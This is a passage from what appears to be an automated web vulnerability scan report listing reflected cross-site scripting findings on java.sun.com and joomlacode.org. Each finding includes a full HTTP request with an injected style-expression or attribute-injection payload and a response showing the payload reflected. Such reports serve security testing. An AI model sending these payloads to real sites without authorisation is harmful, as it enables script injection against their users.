This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products6036f"style%3d"x%3aexpression(alert(1))"1d04adb81fe/plugin/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:10:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>

<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products6036f"style="x:expression(alert(1))"1d04adb81fe/plugin/autodl/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.113. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://java.sun.com
Path:	/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f027"style%3d"x%3aexpression(alert(1))"82c3e87f4db was submitted in the REST URL parameter 2. This input was echoed as 3f027"style="x:expression(alert(1))"82c3e87f4db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin3f027"style%3d"x%3aexpression(alert(1))"82c3e87f4db/autodl/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:10:20 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>

<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin3f027"style="x:expression(alert(1))"82c3e87f4db/autodl/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.114. http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://java.sun.com
Path:	/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754e0"style%3d"x%3aexpression(alert(1))"fe88d234451 was submitted in the REST URL parameter 3. This input was echoed as 754e0"style="x:expression(alert(1))"fe88d234451 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/plugin/754e0"style%3d"x%3aexpression(alert(1))"fe88d234451/jinstall-1_4_2-windows-i586.cab HTTP/1.1
Host: java.sun.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 25 Jan 2011 15:10:53 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sun Microsystems</title>

<meta http-equiv="content-type" content="text/html; charse
...[SNIP]...
<a href="/contact/feedback.jsp?
referer=http://java.sun.com/notfound.jsp
&requrl=http://java.sun.com/products/plugin/754e0"style="x:expression(alert(1))"fe88d234451/jinstall-1_4_2-windows-i586.cab
&refurl=http://java.sun.com/UserTypedUrl
&category=se">
...[SNIP]...

4.115. http://joomlacode.org/gf/account/ [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://joomlacode.org
Path:	/gf/account/

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32b15"%20a%3db%2094a4ff668b0 was submitted in the redirect parameter. This input was echoed as 32b15" a=b 94a4ff668b0 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gf/account/?action=Login&redirect=%2Fgf%2Fproject%2Fjoomla%2Freporting%2F32b15"%20a%3db%2094a4ff668b0 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:03:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<input type="hidden" name="redirect" value="/gf/project/joomla/reporting/32b15" a=b 94a4ff668b0" />
...[SNIP]...

4.116. http://joomlacode.org/gf/project/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6c95"style%3d"x%3aexpression(alert(1))"a2a3aa10cec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6c95"style="x:expression(alert(1))"a2a3aa10cec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/?d6c95"style%3d"x%3aexpression(alert(1))"a2a3aa10cec=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/?action=&d6c95"style="x:expression(alert(1))"a2a3aa10cec=1&project_limit=5">
...[SNIP]...

4.117. http://joomlacode.org/gf/project/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57b13'style%3d'x%3aexpression(alert(1))'4d30efc0df0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57b13'style='x:expression(alert(1))'4d30efc0df0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/?57b13'style%3d'x%3aexpression(alert(1))'4d30efc0df0=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
roject_PROJECT_NAME_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["projectproject_PROJECT_NAME_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/?action=&57b13'style='x:expression(alert(1))'4d30efc0df0=1&projectsort_by=project.PROJECT_NAME&projectsort_order=asc' />
...[SNIP]...

4.118. http://joomlacode.org/gf/project/com_joodater/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/com_joodater/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e6731'style%3d'x%3aexpression(alert(1))'526aca74341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6731'style='x:expression(alert(1))'526aca74341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/com_joodater/news/?e6731'style%3d'x%3aexpression(alert(1))'526aca74341=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
_POST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/com_joodater/news/?action=&e6731'style='x:expression(alert(1))'526aca74341=1&newssort_by=news.POST_DATE&newssort_order=asc' />
...[SNIP]...

4.119. http://joomlacode.org/gf/project/com_joodater/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/com_joodater/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d560d"style%3d"x%3aexpression(alert(1))"9bcca7c27f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d560d"style="x:expression(alert(1))"9bcca7c27f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/com_joodater/news/?d560d"style%3d"x%3aexpression(alert(1))"9bcca7c27f3=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/com_joodater/news/?action=&d560d"style="x:expression(alert(1))"9bcca7c27f3=1&__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.120. http://joomlacode.org/gf/project/feedgator/frs/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/feedgator/frs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bffa0"style%3d"x%3aexpression(alert(1))"cfbd9ee172b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bffa0"style="x:expression(alert(1))"cfbd9ee172b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/feedgator/frs/?bffa0"style%3d"x%3aexpression(alert(1))"cfbd9ee172b=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:39:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/feedgator/frs/?action=&bffa0"style="x:expression(alert(1))"cfbd9ee172b=1&__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.121. http://joomlacode.org/gf/project/feedgator/frs/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/feedgator/frs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fc19e'style%3d'x%3aexpression(alert(1))'505c176eb8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc19e'style='x:expression(alert(1))'505c176eb8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/feedgator/frs/?fc19e'style%3d'x%3aexpression(alert(1))'505c176eb8a=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:40:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
ackage_name_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_pkgrlspackage_name_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/feedgator/frs/?action=&fc19e'style='x:expression(alert(1))'505c176eb8a=1&br_pkgrlssort_by=package_name&br_pkgrlssort_order=asc' />
...[SNIP]...

4.122. http://joomlacode.org/gf/project/feedgator/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/feedgator/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 27f9c'style%3d'x%3aexpression(alert(1))'a61287d2c0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27f9c'style='x:expression(alert(1))'a61287d2c0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/feedgator/news/?27f9c'style%3d'x%3aexpression(alert(1))'a61287d2c0e=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:38:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
ews_POST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/feedgator/news/?action=&27f9c'style='x:expression(alert(1))'a61287d2c0e=1&newssort_by=news.POST_DATE&newssort_order=asc' />
...[SNIP]...

4.123. http://joomlacode.org/gf/project/feedgator/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/feedgator/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f59f"style%3d"x%3aexpression(alert(1))"bb796709e03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f59f"style="x:expression(alert(1))"bb796709e03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/feedgator/news/?3f59f"style%3d"x%3aexpression(alert(1))"bb796709e03=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:38:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/feedgator/news/?action=&3f59f"style="x:expression(alert(1))"bb796709e03=1&__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.124. http://joomlacode.org/gf/project/imgttfmenu/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/imgttfmenu/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e9a"style%3d"x%3aexpression(alert(1))"8d8684829a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94e9a"style="x:expression(alert(1))"8d8684829a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/imgttfmenu/news/?94e9a"style%3d"x%3aexpression(alert(1))"8d8684829a5=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/imgttfmenu/news/?action=&94e9a"style="x:expression(alert(1))"8d8684829a5=1&__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.125. http://joomlacode.org/gf/project/imgttfmenu/news/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/imgttfmenu/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4f7bf'style%3d'x%3aexpression(alert(1))'1597b2bf2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4f7bf'style='x:expression(alert(1))'1597b2bf2b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/imgttfmenu/news/?4f7bf'style%3d'x%3aexpression(alert(1))'1597b2bf2b0=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
ws_POST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/imgttfmenu/news/?action=&4f7bf'style='x:expression(alert(1))'1597b2bf2b0=1&newssort_by=news.POST_DATE&newssort_order=asc' />
...[SNIP]...

4.126. http://joomlacode.org/gf/project/joomla/frs/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/frs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d43d'style%3d'x%3aexpression(alert(1))'7e573a5d85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d43d'style='x:expression(alert(1))'7e573a5d85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/frs/?5d43d'style%3d'x%3aexpression(alert(1))'7e573a5d85=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
lspackage_name_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_pkgrlspackage_name_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/joomla/frs/?action=&5d43d'style='x:expression(alert(1))'7e573a5d85=1&br_pkgrlssort_by=package_name&br_pkgrlssort_order=asc' />
...[SNIP]...

